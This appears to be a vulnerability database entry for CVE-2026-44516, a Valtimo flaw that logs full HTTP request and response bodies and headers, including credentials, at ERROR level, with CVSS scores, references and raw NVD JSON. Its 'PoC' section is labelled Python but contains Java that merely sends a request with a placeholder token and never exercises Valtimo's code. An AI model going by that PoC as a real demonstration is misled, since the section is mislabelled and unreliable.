CVE-2026-44516

Description

Valtimo is an open-source business process automation platform. From 12.4.0 to 12.33.0 and 13.26.0, the LoggingRestClientCustomizer in the web module automatically intercepts all outgoing HTTP calls made via Spring's RestClient and logs the full request body, response body, and response headers. When an error response is received, this information is included in the thrown HttpClientErrorException message, which is logged at ERROR level by Spring's default exception handling — regardless of the application's DEBUG log level setting. This vulnerability is fixed in 12.33.0 and 13.26.0.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Valtimo 12.4.0 至 12.33.0 (不含)

Valtimo 13.0.0 至 13.26.0 (不含)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC Concept: Trigger 4xx error to force logging of headers/body.
 * This demonstrates the behavior described in the CVE.
 */
import org.springframework.web.client.RestClient;
import org.springframework.web.client.HttpClientErrorException;

public class ValitmoLogLeakPoC {
    public static void main(String[] args) {
        RestClient client = RestClient.create();
        try {
            // Simulate a request with a sensitive header
            String result = client.get()
                .uri("https://vulnerable-api.example.com/protected/resource")
                .header("Authorization", "Bearer SENSITIVE_TOKEN_HERE")
                .retrieve()
                .body(String.class);
        } catch (HttpClientErrorException e) {
            // Vulnerable behavior: The application logs the exception 'e',
            // which contains the full request headers and body at ERROR level.
            System.err.println("Check server logs for leaked token.");
            throw e;
        }
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44516
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44516
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44516/
[4] VulDB https://vuldb.com/cve/CVE-2026-44516
[5] https://github.com/valtimo-platform/valtimo/security/advisories/GHSA-3jh5-rr2q-xfv7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44516", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:23.363", "lastModified": "2026-05-14T18:14:47.290", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Valtimo is an open-source business process automation platform. From 12.4.0 to 12.33.0 and 13.26.0, the LoggingRestClientCustomizer in the web module automatically intercepts all outgoing HTTP calls made via Spring's RestClient and logs the full request body, response body, and response headers. When an error response is received, this information is included in the thrown HttpClientErrorException message, which is logged at ERROR level by Spring's default exception handling — regardless of the application's DEBUG log level setting. This vulnerability is fixed in 12.33.0 and 13.26.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://github.com/valtimo-platform/valtimo/security/advisories/GHSA-3jh5-rr2q-xfv7", "source": "[email protected]"}]}}